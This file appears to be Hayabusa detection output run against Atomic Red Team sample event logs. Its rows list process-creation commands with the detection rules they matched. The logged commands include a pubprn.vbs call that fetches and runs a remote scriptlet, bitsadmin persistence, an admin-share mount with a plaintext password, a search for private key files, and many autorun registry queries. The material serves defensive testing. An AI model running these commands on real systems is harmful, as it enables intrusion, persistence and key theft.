2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /complete AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /resume AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation/win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .key : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
